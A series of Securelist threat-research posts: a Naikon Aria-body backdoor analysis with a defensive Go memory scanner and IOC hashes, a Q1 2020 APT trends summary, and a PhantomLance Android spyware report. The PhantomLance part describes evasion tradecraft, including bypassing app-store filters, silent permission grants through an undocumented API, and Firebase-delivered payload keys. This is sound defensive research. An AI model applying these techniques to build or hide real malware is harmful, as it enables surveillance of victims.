Naikon’s Aria | Securelist

Our colleagues at Checkpoint put together a fine research writeup on some Naikon resources and activity related to “aria-body” that we detected in 2017 and similarly reported in 2018. To supplement their research findings, we are summarizing and publishing portions of the findings reported in our June 2018 “Naikon’s New AR Backdoor Deployment to Southeast Asia”. This malware and activity aligns with much of what the Checkpoint researchers brought to light today.

The Naikon APT became well known in May 2015, when our public reporting first mentioned and then fully described the group as a long-running presence in the APAC region. Even after the group shut down much of its offensive activity following years of campaigns, Naikon maintained several splinter campaigns. Matching malware artifacts, functionality and targeting demonstrate that the group continued to wage cyber-espionage campaigns in the South China Sea region during 2018.

“Aria-Body” or “AR” is a set of backdoors with compilation timestamps between January 2017 and February 2018. It can be particularly difficult to detect, as much of this code operates in memory, injected by other loader components without touching disk. We trace portions of this codebase back to the “xsFunction” EXE and DLL modules used in Naikon operations going back to 2012, as the AR modules implement a subset of the xsFunction feature set. In all likelihood, this new backdoor and related activity is an extension of, or a merge with, the group’s “Paradir Operation”. In the past, the group targeted communications and sensitive information from executive and legislative offices, law enforcement, government administration, and military and intelligence organizations within Southeast Asia. In many cases we have seen that these same systems were previously targeted with PlugX and other malware. So the group has evolved a bit since 2015, and its activity against these same profiles continued into 2018. We identified at least half a dozen individual variants from 2017 and 2018.

Technical Details

It seems clear that the same codebase has been reused by Naikon since at least 2012, and that the recent AR backdoors were built from that same code. Their use was tightly clustered in organizations that Naikon had previously and heavily targeted, again lending confidence to clustering these resources and activity with earlier “Naikon” operations.


Naikon’s new AR backdoor is a DLL loaded into any one of several host processes, providing remote access to the system. AR load attempts have been identified within processes whose executable images are listed here:

  • c:\windows\system32\svchost.exe
  • c:\windows\syswow64\svchost.exe
  • c:\program files\windows nt\accessories\services.exe
  • c:\users\dell\appdata\roaming\microsoft\windows\start menu\programs\startup\acrobat.exe
  • c:\alphazawgyi\svchost.exe

Because this AR code is injected into processes, the YARA rule provided in the Appendix is best run against memory dumps of processes whose main image is in the list above. The AR modules have additionally been seen in some other hosts, including “msiexec.exe” processes.
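Since the AR module lives only in memory, a disk-based scan misses it; the YARA rule is meant for process dumps. The Go program below is an added example of the same idea without YARA; it is not code from this post or from Naikon tooling. It walks a raw memory buffer for MZ/PE headers, bounds each image by its SizeOfImage field, and flags images that export both AzManager and DebugAzManager (the export pair shared by the two samples described below) or that carry one of their internal names. The dump it scans is constructed inline, with a decoy “MZ” to show that the bare magic string is not enough, and the host-process check uses the list above plus msiexec.exe.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"strings"
)

// Indicators taken from the two AR samples described in the post: both export
// AzManager and DebugAzManager, and carry one of these internal DLL names.
var arInternalNames = [][]byte{[]byte("TCPx86.dll"), []byte("aria-body-dllX86.dll")}

// Hit describes one candidate PE image found inside a memory buffer.
type Hit struct {
	Offset       int    // offset of the "MZ" header in the buffer
	SizeOfImage  uint32 // from the optional header, clamped to the buffer
	InternalName string // matched internal name, or "" if none
	HasARExports bool   // both AzManager and DebugAzManager present
}

// ScanMemory walks a raw memory buffer (e.g. a process dump) looking for PE
// headers and reports images whose export names match the AR backdoor. It is
// offset-based, so it works on injected images that never touched disk.
func ScanMemory(buf []byte) []Hit {
	var hits []Hit
	for off := 0; off+0x40 <= len(buf); off++ {
		if buf[off] != 'M' || buf[off+1] != 'Z' {
			continue
		}
		eLfanew := int(binary.LittleEndian.Uint32(buf[off+0x3C:]))
		pe := off + eLfanew
		// Need the PE signature (4), COFF header (20) and enough optional
		// header to read SizeOfImage at optional-header offset 56.
		if eLfanew == 0 || eLfanew > 0x400 || pe+24+60 > len(buf) {
			continue
		}
		if !bytes.Equal(buf[pe:pe+4], []byte("PE\x00\x00")) {
			continue
		}
		sizeOfImage := binary.LittleEndian.Uint32(buf[pe+24+56:])
		end := off + int(sizeOfImage)
		if sizeOfImage == 0 || end > len(buf) {
			end = len(buf) // image runs past the captured region; scan what we have
		}
		region := buf[off:end]
		h := Hit{Offset: off, SizeOfImage: uint32(end - off)}
		// Export names are NUL-terminated; the leading NUL avoids matching
		// "AzManager" inside "DebugAzManager".
		h.HasARExports = bytes.Contains(region, []byte("\x00AzManager\x00")) &&
			bytes.Contains(region, []byte("DebugAzManager\x00"))
		for _, n := range arInternalNames {
			if bytes.Contains(region, n) {
				h.InternalName = string(n)
				break
			}
		}
		if h.HasARExports || h.InternalName != "" {
			hits = append(hits, h)
		}
	}
	return hits
}

// HostOfInterest reports whether an image path is one of the host processes
// in which AR load attempts were observed (the list above plus msiexec.exe).
func HostOfInterest(imagePath string) bool {
	p := strings.ToLower(imagePath)
	base := p[strings.LastIndexAny(p, `\/`)+1:]
	switch base {
	case "svchost.exe", "services.exe", "acrobat.exe", "msiexec.exe":
		return true
	}
	return false
}

// BuildSampleDump constructs a synthetic dump: filler, a decoy "MZ" that is
// not a PE header, then a minimal fake image carrying the AR indicators.
// Constructed data, not bytes from a real sample.
func BuildSampleDump() []byte {
	img := make([]byte, 0x300)
	copy(img, "MZ")
	binary.LittleEndian.PutUint32(img[0x3C:], 0x80)        // e_lfanew
	copy(img[0x80:], "PE\x00\x00")                          // PE signature
	binary.LittleEndian.PutUint32(img[0x80+24+56:], 0x300) // SizeOfImage
	copy(img[0x200:], "TCPx86.dll\x00AzManager\x00DebugAzManager\x00")

	var dump []byte
	dump = append(dump, bytes.Repeat([]byte{0xCC}, 0x100)...)
	dump = append(dump, "MZ is not a header here: AzManager\x00"...) // decoy
	dump = append(dump, make([]byte, 0x40)...)
	dump = append(dump, img...)
	dump = append(dump, make([]byte, 0x20)...)
	return dump
}

func main() {
	for _, h := range ScanMemory(BuildSampleDump()) {
		fmt.Printf("AR image at offset 0x%x (SizeOfImage %d): exports=%v internal=%q\n",
			h.Offset, h.SizeOfImage, h.HasARExports, h.InternalName)
	}
	fmt.Println("svchost is a host of interest:", HostOfInterest(`c:\windows\syswow64\svchost.exe`))
}
```

Run it against a real dump by reading the file into `buf` and calling `ScanMemory`; the `HostOfInterest` check is what you would apply to the process list first so that only the relevant dumps are collected.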

Below are characteristics of the oldest AR and the newest known AR component in our collection.

Oldest AR component:
MD5: c766e55c48a4b2e7f83bfb8b6004fc51
SHA256: 357c8825b3f03414582715681e4e0316859b17e702a6d2c8ea9eb0fd467620a4
Compiled on: Tue Jan  3 09:23:48 2017
Type: PE32 DLL
Internal name: TCPx86.dll
Size: 176 KB
Exports: AzManager, DebugAzManager

Newest AR component:
MD5: 2ce4d68a120d76e703298f27073e1682
SHA256: 4cab6bf0b63cea04c4a44af1cf25e214771c4220ed48fff5fca834efa117e5db
Compiled on: Thu Feb 22 10:04:02 2018
Type: PE32 DLL
Internal name: aria-body-dllX86.dll
Size: 204 KB
Exports: AzManager, DebugAzManager

When the DLL is loaded, it registers a window class whose window procedure performs a removable-drive check, a CONNECT-proxied callback to its main C2, an external IP address check against checkip.amazonaws[.]com, and further communications with a C2. The flow of some earlier modules includes more or less system information collection prior to the initial callback.

The most recent version of the backdoor uses another window procedure to implement a Raw Input based keystroke collector. This keylogger functionality was newly introduced into the malware code in February 2018 and was not present in previous versions.

The approximately 200 – 250kb AR backdoor family provides a familiar and slightly changing functionality set per compiled module. Because Checkpoint covers the same technical points in their post, we provide this simple summary list:

  • Persistence handling
  • File and directory handling
  • Keylogging
  • Shell/Process Management
  • Network activity and status listing and management
  • System information collection and management
  • Download management
  • Windows management
  • Extension management
  • Location/IP verification
  • Network Communications over HTTP

Similarities to past Naikon components

Naikon components going back to 2012 share heavy similarities with the current “Aria-body” modules. Not only is some of the functionality only lightly modified, but the same misspellings in error logging remain in the codebase. Let’s examine an older 2013 Naikon module and a newer 2017 Naikon AR module here.

It’s clear that the underlying codebase continues to be deployed:

e09254fa4398fccd607358b24b918b63, CompiledOn: 2013:09:10 09:00:15

c766e55c48a4b2e7f83bfb8b6004fc51, CompiledOn: 2017:01:03 09:23:48

Kudos to the Checkpoint researchers for providing new details of the Naikon story into the public discussion.

For reference, some hashes and a YARA rule are provided here. More incident, infrastructure and IOC details are available to our threat intel customers (please contact [email protected]).

Indicators of compromise

AR aria-body dll
c766e55c48a4b2e7f83bfb8b6004fc51
2ce4d68a120d76e703298f27073e1682

Loaders and related Naikon malware
0ed1fa2720cdab23d969e60035f05d92
3516960dd711b668783ada34286507b9

Verdicts – 2018 and Later
Trojan.Win32.Generic.gen
Trojan.Win32.SEPEH.gen
DangerousObject.Multi.Generic
Backdoor.Win64.Agent.h*
Backdoor.Win32.Agent.m*
Trojan-Downloader.Win32.Agent.x*

YARA Rules



APT trends report Q1 2020

For more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q1 2020.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact ‘[email protected]’.

Given the exceptional situation the world is living through because of the COVID-19 pandemic, we must start with a summary of how APT groups have been abusing this topic for different types of attacks.

COVID-19 APT activity

Since the World Health Organization (WHO) declared COVID-19 a pandemic, the topic has received increased attention from different attackers. Many of the phishing scams we’ve seen have been launched by cybercriminals trying to cash in on people’s fears about the virus. However, the list of attackers also includes APT threat actors such as Kimsuky, APT27, Lazarus and ViciousPanda who, according to OSINT, have used COVID-19-themed lures to target their victims. We recently discovered suspicious infrastructure that could have been used to target health and humanitarian organizations, including the WHO. Even though the infrastructure cannot be attributed to any particular actor at the moment, and was registered in June 2019, before the COVID-19 crisis, according to some private sources it might be related to the DarkHotel actor. However, we cannot confirm this information at the moment. Interestingly, some groups have used the current situation to try to soften their reputation by declaring that they would not target health organizations during the crisis.

There are different publications reporting activity related to other APT actors using this lure, but in general, we do not believe this implies a meaningful change in terms of TTPs other than using a trendy topic for luring victims. We are closely monitoring the situation.

The most remarkable findings

In January 2020, we discovered a watering hole utilizing a full remote iOS exploit chain. The site appears to have been designed to target users in Hong Kong, based on the content of the landing page. While the exploits currently in use are known, the actor responsible is actively modifying the exploit kit to target more iOS versions and devices; we observed the latest modifications on February 7. The project is broader than we initially thought, supporting an Android implant and probably implants for Windows, Linux and macOS. For the time being, we are calling this APT group TwoSail Junk. We believe this is a Chinese-speaking group; it maintains infrastructure mostly within Hong Kong, along with a couple of hosts located in Singapore and Shanghai. TwoSail Junk directs visitors to its exploit site by posting links within the threads of forum discussions, or by creating new topic threads of its own. To date, dozens of visits have been recorded from within Hong Kong, with a couple from Macau. The technical details of the iOS implant, called LightSpy, and the related infrastructure reveal a low-to-mid capable actor. However, the iOS implant is a modular and exhaustively functional iOS surveillance framework.

Russian-speaking activity

In January, a couple of recently compiled SPLM/XAgent modules were detected in an Eastern European telecoms company. The initial point of entry is unknown, as is their lateral movement within this organization. It has become rare to identify SPLM infections, compared to past levels of Sofacy activity, so it seems that portions of this network may have been infected for some time. In addition to these SPLM modules, Sofacy also deployed .NET XTUNNEL variants and their loaders. These 20KB XTUNNEL samples themselves seem minimal in comparison to past XTUNNEL samples, which weighed in at 1-2MB. This shift to C# by the long-standing Sofacy XTunnel codebase reminds us of Zebrocy’s practice of re-coding and innovating long-used modules in multiple languages.

Gamaredon, a well-known APT group that has been active since at least 2013, has traditionally focused on Ukrainian entities. In recent months we have observed a campaign, made up of different waves, that has also been reported by multiple researchers on social networks. The attackers sent malicious documents using remote template injection, resulting in a multi-level infection scheme that deploys a malicious loader which periodically contacts a remote C2 to download additional samples. Based on past research, we know that Gamaredon’s toolkit includes many different malware artefacts developed to achieve different goals: scanning drives for specific system files, capturing screenshots, executing remote commands, downloading additional files and managing the remote machine with programs such as UltraVNC. In this case, we observed an interesting new second-stage payload with spreading capabilities, which we call “Aversome infector”. This malware seems to have been developed to maintain strong persistence in the target network and to move laterally by infecting Microsoft Word and Excel documents on external drives.

Chinese-speaking activity

CactusPete is a Chinese-speaking cyber-espionage group active since at least 2012 characterized by medium-level technical capabilities. Historically, this threat actor has targeted organizations within a limited range of countries – South Korea, Japan, the US and Taiwan. At the end of 2019 the group seemed to shift towards a heavier focus on Mongolian and Russian organizations. CactusPete offensive activity against the Russian defense industry and Mongolian government appears to be mostly delineated from its Russian-Mongolian commercial and border relationships. However, one bait exploit document dropping its Flapjack backdoor (tmplogon.exe, primarily focused on new Russian targets) is authored in Mongolian. The group’s broadening of techniques, exploit re-purposing, targeting shift and possible expansion suggests changes in the group’s resources and operations.

Rancor is a group that has been publicly reported since 2018, with connections to DragonOK. This actor traditionally had a focus on Southeast Asian targets, namely Cambodia, Vietnam and Singapore. We noted several updates to the group’s activity in the last few months, namely the discovery of a new variant of the Dudell malware that we are calling ExDudell, a new tool for bypassing UAC (User Account Control), and new infrastructure utilized in the attacks. Apart from this, we have also identified that the initial lure documents that were previously sent via mail, are now found in the Telegram Desktop directory, suggesting the group is possibly making a shift in its initial delivery method.

In 2019, we detected activity by an unknown actor at the time deploying watering holes on websites representing Tibetan interests, fooling victims into installing fake Adobe Flash updates hosted on a GitHub repository. Kaspersky thwarted the attack by coordinating a takedown of this repository with GitHub. After a brief period of inactivity, we detected a new round of watering holes featuring a renewed toolset. We decided to call the group behind this activity Holy Water.

The threat actor’s unsophisticated but creative toolset has been evolving a lot since the inception date, may still be in development, and leverages Sojson obfuscation, NSIS installer, Python, open-source code, GitHub distribution, Go language, as well as Google Drive-based C2 channels.

Middle East

We recently detected a new, ongoing data exfiltration campaign targeting victims in Turkey that started in February 2020. While StrongPity’s TTPs in terms of targeting, infrastructure and infection vector haven’t changed, we observed a somewhat peculiar change in the documents they attempt to exfiltrate. In this campaign, StrongPity updated its latest signature backdoor, named StrongPity2, and added more files to exfiltrate to its list of common Office and PDF documents, including Dagesh Pro Word Processor files used for Hebrew dotting, RiverCAD files used for river flow and bridge modelling, plain-text files, archives as well as GPG encrypted files and PGP keys.

In March, we discovered a targeted campaign to distribute Milum, a Trojan designed to gain remote control of devices in target organizations, some of which operate in the industrial sector. The first signs of this operation, which we have dubbed WildPressure, can be traced back to August 2019; the campaign remains active. The Milum samples we have seen so far do not share any code similarities with any known APT campaigns. The malware provides attackers with remote control over infected devices, allowing them to download and execute commands, collect and exfiltrate information and install upgrades to the malware.

In late December 2019, Kaspersky Threat Attribution Engine detected a new variant of the Zerocleare wiper that had possibly been used in targeted attacks on energy sector targets in Saudi Arabia. This quarter, we identified a new variant of this wiper, called Dustman. It is similar to Zerocleare in terms of wiping and distribution, but changes in variables and technical names suggest this might have been in readiness for a new wave of attacks specifically targeting Saudi Arabia’s energy sector, based on messages embedded in the malware and the mutex created by it. The PDB file of the Dustman wiper suggested that this destructive code was the release edition and was ready for deployment in a target network. These changes coincided with the New Year holidays, during which many employees take time off to celebrate. Shamoon was delivered with similar timing in 2012 during Ramadan celebrations.

Southeast Asia and Korean Peninsula

A Lazarus campaign outlined by the Italian security company Telsy in November 2019 allowed us to find a connection to previous activity from the group targeting cryptocurrency businesses. The malware mentioned on Telsy’s blog is a first stage downloader that has been observed since mid-2018. We found that the second stage malware is a variant of Manuscrypt, uniquely attributed to Lazarus, deploying two types of payloads. The first is a manipulated Ultra VNC program, and the second is a multi-stage backdoor. This type of multi-stage infection procedure is typical of the Lazarus group’s malware, especially when using the Manuscrypt variant. In this campaign, our telemetry indicates that the Lazarus group attacked cryptocurrency businesses in Cyprus, the US, Taiwan and Hong Kong, and the campaign extended until the beginning of 2020.

Kimsuky, an actor we have been tracking since 2013, was especially active during 2019. In December, Microsoft took down 50 domains used by the group and filed a lawsuit against the attackers in a Virginia court. However, the group has continued its activity without significant changes. We recently discovered a new campaign where the actor used a decoy image themed around New Year’s greetings that delivers its old downloader with a new evolved next-stage payload designed to steal information that uses a new encryption method.

At the end of January, we stumbled upon a malicious script exploiting an Internet Explorer vulnerability, CVE-2019-1367. After closely examining the payload and finding connections with previous activity, we concluded that DarkHotel was behind this campaign, probably in progress since 2018. The campaign saw DarkHotel utilize a multi-stage binary infection phase using home-brewed malware. The initial infection creates a downloader which fetches another downloader to collect system information and fetch the final backdoor only for high-value victims. DarkHotel used a unique combination of TTPs in this campaign. The threat actor used diverse infrastructure to host malware and to control infected victims, including a compromised web server, a commercial hosting service, a free hosting service and a free source code tracking system. We were able to confirm targeted companies in South Korea and Japan in this campaign.

In March, researchers from Google revealed that a group of hackers used five zero-days to target North Koreans and North Korean-focused professionals in 2019. The group exploited flaws in Internet Explorer, Chrome, and Windows with phishing emails that carried malicious attachments or links to malicious sites, as well as watering-hole attacks. We were able to match two of the vulnerabilities – one in IE and one in Windows – to DarkHotel.

FunnyDream is a campaign that started in mid-2018, targeting high-profile entities in Malaysia, Taiwan and the Philippines, with the majority of victims in Vietnam. Our analysis revealed that it is part of a wider campaign, stretching back a few years, that targets governments, and specifically foreign organizations, of countries in Southeast Asia. The attacker’s backdoor downloads files from and uploads files to a C2, executes commands and runs new processes on the victim. It also collects information about other hosts on the network and is delivered to new hosts through remote execution utilities. The attacker also used an RTL backdoor and the Chinoxy backdoor. The C2 infrastructure has been active since mid-2018 and its domains overlap with the FFRAT malware family. In a number of cases, indications suggest the backdoor was delivered via a previous long-term compromise. The campaign is still active.

Operation AppleJeus was one of Lazarus’s more notable campaigns, and the first time the actor targeted macOS. Our January follow-up research revealed significant changes to the group’s attack methodology: homemade macOS malware and an authentication mechanism to carefully deliver the next-stage payload, as well as loading the next-stage payload without touching the disk. To attack Windows victims, the group has elaborated a multi-stage infection procedure and significantly changed the final payload. We believe that Lazarus has been more careful in its attacks since the release of Operation AppleJeus and has employed a number of methods to avoid detection. We identified several victims in the UK, Poland, Russia and China. Moreover, we were able to confirm that several of the victims are linked to cryptocurrency organizations.

Roaming Mantis is a financially motivated actor first reported in 2017, when it used SMS to distribute its malware to Android devices based in South Korea. Since then, the scope of the group’s activities has widened considerably, supporting 27 languages, targeting iOS as well as Android, and even mining cryptocurrency. The actor also added new malware families, including Fakecop and Wroba.j, to its arsenal, and is still active using ‘SMiShing’ for Android malware distribution. In a recent campaign it distributed malicious APKs masquerading as popular couriers and customized for the targeted countries, including Japan, Taiwan, South Korea and Russia.

Other interesting discoveries

TransparentTribe started using a new module named USBWorm at the beginning of 2019, as well as improving its custom .NET tool named CrimsonRAT. Based on our telemetry, USBWorm was used to infect thousands of victims, most of them located in Afghanistan and India, giving the attacker the ability to download and execute arbitrary files, spread to removable devices and steal files of interest from infected hosts, even those disconnected from the internet. As we previously reported, this group mainly focuses on military targets, which are usually compromised with Office documents armed with malicious VBA and open-source malware like Peppy RAT and CrimsonRAT. In its new campaign, which is still active, we noticed the group’s focus shift further towards entities located in Afghanistan in addition to India. Transparent Tribe has also developed a new implant designed to infect Android devices, a modified version of the AhMyth Android RAT, which is open-source malware available on GitHub.

During the last months of 2019, we observed an ongoing campaign conducted by Fishing Elephant. The group continues to use both Heroku and Dropbox in order to deliver its tool of choice, AresRAT. We discovered that the actor incorporated a new technique into its operations that is meant to hinder manual and automatic analysis – geo-fencing and hiding executables within certificate files. During our research, we also detected a change in victimology that may reflect the current interests of the threat actor: the group is targeting government and diplomatic entities in Turkey, Pakistan, Bangladesh, Ukraine and China.

Final thoughts

While the threat landscape isn’t always full of “groundbreaking” events, when we cast our eyes back over the activities of APT threat actors, there are always interesting developments.  Our regular quarterly reviews are intended to highlight the key developments.

These are some of the main trends that we’ve seen this year so far.

  • It’s clear from the activities of various APT groups, including CactusPete, LightSpy, Rancor, Holy Water, TwoSail Junk and others that geo-politics continues to be an important driver of APT activity. This was also underlined this quarter by the UK National Cyber Security Centre laying responsibility for disruptive attacks on Georgia at the feet of Russia’s military intelligence service, indictments in the US of two Chinese nationals for laundering $100 million in cryptocurrency on behalf of North Korea and the alleged ‘catfishing’ of IDF soldiers by Hamas.
  • Financial gain remains a motive for some threat actors, as evidenced by the activities of Lazarus and Roaming Mantis.
  • Southeast Asia is the most active region in terms of APT activities, including established actors such as Lazarus, DarkHotel and Kimsuky, and newer groups such as Cloud Snooper and Fishing Elephant.
  • APT threat actors such as CactusPete, TwoSail Junk, FunnyDream, DarkHotel continue to exploit software vulnerabilities.
  • APT threat actors continue to include mobile implants in their arsenal.
  • APT threat actors such as (but not limited to) Kimsuky, Hades and DarkHotel, as well as opportunistic criminals, are exploiting the COVID-19 pandemic.

All in all, we see the continuous growth of activity in Asia and how some of the actors we called newcomers are now well established. On the other hand, the more traditional advanced actors seem to be more and more selective in their operations, probably following a change of paradigm. The use of mobile platforms for infections and the distribution of malware is on the rise. Every actor seems to have some artefacts for these platforms and in some campaigns they are the main target.

COVID-19 is clearly top of everyone’s minds at the moment and APT threat actors have also been seeking to exploit this topic in spear-phishing campaigns.  We do not believe this represents a meaningful change in terms of TTPs: they’re simply using it as a newsworthy topic to lure their victims. However, we are closely monitoring the situation.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.



Hiding in plain sight: PhantomLance walks into a market

In July 2019, Dr. Web reported a backdoor trojan in Google Play which appeared to be sophisticated and unlike the common malware often uploaded to steal victims’ money or display ads. So, we conducted an inquiry of our own, discovering a long-term campaign, which we dubbed “PhantomLance”, whose earliest registered domain dates back to December 2015. We found dozens of related samples that had been appearing in the wild since 2016 and had been deployed in various application marketplaces including Google Play. One of the latest samples was published on the official Android market on November 6, 2019. We informed Google of the malware, and it was removed from the market shortly after.

The latest example of spyware in Google Play disguised as a browser cleaner

During our investigation, we discovered various overlaps with reported OceanLotus APT campaigns. Specifically, we found multiple code similarities with the previous Android campaign as well as with macOS backdoors, infrastructure overlaps with Windows backdoors, and a few cross-platform resemblances.

Besides the attribution details, this document describes the actors’ spreading strategy, their techniques for bypassing app market filters, malware version diversity and the latest sample deployed in 2020, which uses Firebase to decrypt the malicious payload.

Our report is broken down into several sections.

  1. Malware versions – technical description of versions found, their features and relationships between them.
  2. Spread – information on specific tactics used by the threat actors for distributing their malware.
  3. Infrastructure – further details on uncovered infrastructure pieces as well as overlaps found.
  4. Victimology – thoughts on the actors’ interests in choosing their targets.
  5. Overlaps with previous campaigns – details of similarities with all related campaigns that we have identified.

More information on PhantomLance is available to customers of Kaspersky Intelligence Reporting. For more information, contact [email protected]

Malware versions

For the purposes of the research, we divided the samples we found into a series of “versions” based on technical complexity: from the basic Version 1 to the highly sophisticated Version 3. Note that these do not fully correlate with the chronological order of their appearance in the wild (ITW): for example, we observed Version 1 samples in late 2019 as well as in 2017, the year in which we also saw Version 3.

The functionality of all samples is similar: the main purpose of the spyware is to gather sensitive information. While the basic functionality was not very broad, comprising geolocation, call logs, contact access and SMS access, the application could also gather a list of installed applications, as well as device information such as model and OS version. Furthermore, the threat actor was able to download and execute various malicious payloads, adapting the payload to the specific device environment, such as Android version and installed apps. This way the actor avoids overloading the application with unnecessary features while still gathering the information needed.

Version 1

We attribute the latest Google Play sample (MD5: 2e06bbc26611305b28b40349a600f95c) to this version. This sample is a payload in the clear: unlike the other versions, it does not drop an additional executable file. Our main theory about the reasons for all these versioning maneuvers is that the attackers are trying diverse techniques to achieve their key goal, bypassing the official Google marketplace filters. And achieve it they did: even this version passed Google’s filters and was uploaded to Google Play in 2019 (see the Spread section for details).

No suspicious permissions are mentioned in the manifest file; instead, they are requested dynamically and hidden inside the dex executable. This seems to be a further attempt at circumventing security filtering. In addition to that, there is a feature that we have not seen before: if the root privileges are accessible on the device, the malware can use a reflection call to the undocumented API function “setUidMode” to get permissions it needs without user involvement.

Note that this trick only works with Android SDK version 19 or higher.

Most of the aforementioned operations naturally require root access, but we believe that the root exploit may be delivered as payload in a server response to collected device info. Also, some of the applications that the malware mimics will have notified the user that they only work on rooted devices. For instance, Browser Cleaner can only clean up the browser cache if it is given root permissions.

Version 2

Specimens of this version were also detected in 2019 and earlier. One of the samples was located in Google Play Store in November 2019 and described in the Dr. Web blog. Based on our detection statistics and spotted version stamps, we believe that this version is a replacement for Version 3, which we did not observe in 2019.

Below are the most valuable points and the main differences from Version 1.

The malicious payload APK is now packed in an encrypted file in the assets directory and is decrypted by the first stage using an AES algorithm. A decryption key and initialization vector (IV) are located in the first 32 + 16 bytes of the encrypted payload.

After decryption, the asset file will look like this.

As you can see, before the APK magic, the file header contains strings that are used for making further reflection calls to payload methods. Here is the first-stage code fragment with explanations regarding the payload loading process.

All Version 2 payloads use the same package name, “com.android.play.games”, which probably mimics the official Google Play Games package, “com.google.android.play.games”.

Moreover, we spotted developer version stamps in decrypted payloads.

MD5 | Developer version stamp
65d399e6a77acf7e63ba771877f96f8e | 5.10.6084
6bf9b834d841b13348851f2dc033773e | 5.10.6090
8d5c64fdaae76bb74831c0543a7865c3 | 5.10.9018
3285ae59877c6241200f784b62531694 | 5.10.9018
e648a2cc826707aec33208408b882e31 | 5.10.9018

It is worth mentioning that the payload manifests do not contain any permission requests. As stated in the description of Version 1, the permissions required by the malicious features are granted via an undocumented Android API.

We have found two different certificates used for signing Version 2 payloads.

MD5 | Certificate
6bf9b834d841b13348851f2dc033773e, 65d399e6a77acf7e63ba771877f96f8e | Serial Number: 0xa4ed88e620b8262e; Issuer: CN=Lotvolron; Validity: from Wed Jan 20 11:30:49 MSK 2010
8d5c64fdaae76bb74831c0543a7865c3, 3285ae59877c6241200f784b62531694, e648a2cc826707aec33208408b882e31 | Serial Number: 0xd47c08706d440384; Issuer: CN=Ventoplex; Validity: from Wed Apr 13 05:21:26 MSK 2011

Although validity dates look spoofed in both cases and do not point to any real deployment times, by analyzing all payload certificates, we discovered that the second one (Ventoplex) was used to sign Version 3 payloads as well.

Version 2.1

The latest samples of PhantomLance, discovered in early 2020, introduced a new technique for decrypting payloads: the malicious payload is shipped with its dropper, encrypted with AES, but the key is not stored anywhere in the dropper itself. Instead, it is sent to the device using Google’s Firebase remote config system. The other technical features are very similar to the ones we observed in Version 2, so we tagged this generation as Version 2.1.

We were able to make a valid request to PhantomLance’s Firebase API. The response was a JSON struct in which the “code_disable” value is the AES decryption key for the payload.

Importantly, the dropper expects the AES decryption key to be stored in a parameter named “code”, so this specific variant should not function properly. Besides, we noticed that Firebase previously returned one more field, named “conf_disable”, with the same value as “code_disable”, so we assume that the actors are still tinkering with this new feature.

Another interesting technique that the actors are trying to implement is a third-stage payload implant. The second-stage payload (MD5: 83cd59e3ed1ba15f7a8cadfe9183e156) contains an APK file named “data” (MD5: 7048d56d923e049ca7f3d97fb5ba9812) with a corrupted header in the assets path.

The second stage reads this APK file, decrypts it and rewrites its first 27 bytes as described below.

This results in an APK file (MD5: c399d93146f3d12feb32da23b75304ba) that appears to be a typical PhantomLance payload configured with already known C2 servers (cloud.anofrio[.]com, video.viodger[.]com, api.anaehler[.]com). This third-stage APK is deployed with a custom native library named “data.raw”, also stored at the assets path. This library is used for achieving persistence on the infected device and appears to be a custom daemonized ELF executable based on the open-source “daemon.c” Superuser tool component, while in previous samples, we saw MarsDaemon used for this purpose.

Code comparison of the library used to daemonize the third-stage payload with the daemon.c source code hosted on GitHub

Version 3

Although Version 2 appears to have replaced this one, since we have not observed any new deployments of Version 3 in 2019, Version 3 still looks more advanced in terms of technical details than Version 2. According to our detection statistics and deployment dates on application markets, Version 3 was active at least from 2016 to 2018.

Below are the most valuable points and main differences between Version 3 and Version 2.

The first-stage dropper appears even more obfuscated than that of Version 2. It decrypts the payload in a similar way, with minor differences: the encrypted content is split into multiple asset files under 10256 bytes in size, plus an encrypted config file that contains the payload decryption details.

Below is the payload decryption sequence.

  1. Decrypt the payload config file from the assets with both a hardcoded name and AES key.
  2. Read the following values from the decrypted payload config file in this order:
    • AES key for APK payload decryption
    • Class and method names for reflection calls to the payload
    • MD5 for APK payload integrity check
    • Number and names of the split APK payload parts
  3. Decrypt the APK payload header hardcoded in the first stage with the AES key from the payload config. Write it to the APK payload file.
  4. Using decrypted names of the split payload parts, decrypt their content and append them to the APK payload file one by one.
  5. Check the integrity of the resulting APK payload file by comparing with the MD5 value decrypted from the payload config.
  6. Load and run the APK payload.

The following reversed code fragment represents the actual payload decryption process.

Each Version 3 payload has the same package name, “com.android.process.gpsp”, and is signed with the same certificate (CN=Ventoplex), used to sign some of the Version 2 payloads.

The only developer version stamp that we have found in Version 3 payloads is “10.2.98”.

Another notable finding is the 243e2c6433815f2ecc204ada4821e7d6 sample, which we believe belongs to a Version 3 payload. However, no related dropper has been spotted in the wild, and unlike the other payloads, it is signed with a debug certificate and not obfuscated at all, revealing all variable/class/method names and even BuildConfig values. Our guess is that this is a debug developer version that somehow got leaked.

As a conclusion to this technical review, it is worth saying that all payloads across the different versions, even Version 1, which is in fact a clear payload without a dropper, share a code structure and the locations where sensitive strings, such as C2 addresses, are stored.

Spread

The main spreading vector used by the threat actors is distribution through application marketplaces. Apart from the com.zimice.browserturbo, which we have reported to Google, and com.physlane.opengl, reported by Dr. Web, we have observed tracks indicating that many malicious applications were deployed to Google Play in the past and have now been removed.

These search results contain a link to already-removed malware in Google Play

Some of the applications whose appearance in Google Play we can confirm.

Package name | Google Play persistence date (at least)
com.zimice.browserturbo | 2019-11-06
com.physlane.opengl | 2019-07-10
com.unianin.adsskipper | 2018-12-26
com.codedexon.prayerbook | 2018-08-20
com.luxury.BeerAddress | 2018-08-20
com.luxury.BiFinBall | 2018-08-20
com.zonjob.browsercleaner | 2018-08-20
com.linevialab.ffont | 2018-08-20

Besides, we have identified multiple third-party marketplaces that, unlike Google Play, still host the malicious applications, such as https://apkcombo[.]com, https://apk[.]support/, https://apkpure[.]com, https://apkpourandroid[.]com and many others.

Example of a malicious application with a description in Vietnamese that is still available in a third-party marketplace (hxxps://androidappsapk[.]co/detail-cham-soc-be-yeu-babycare/)

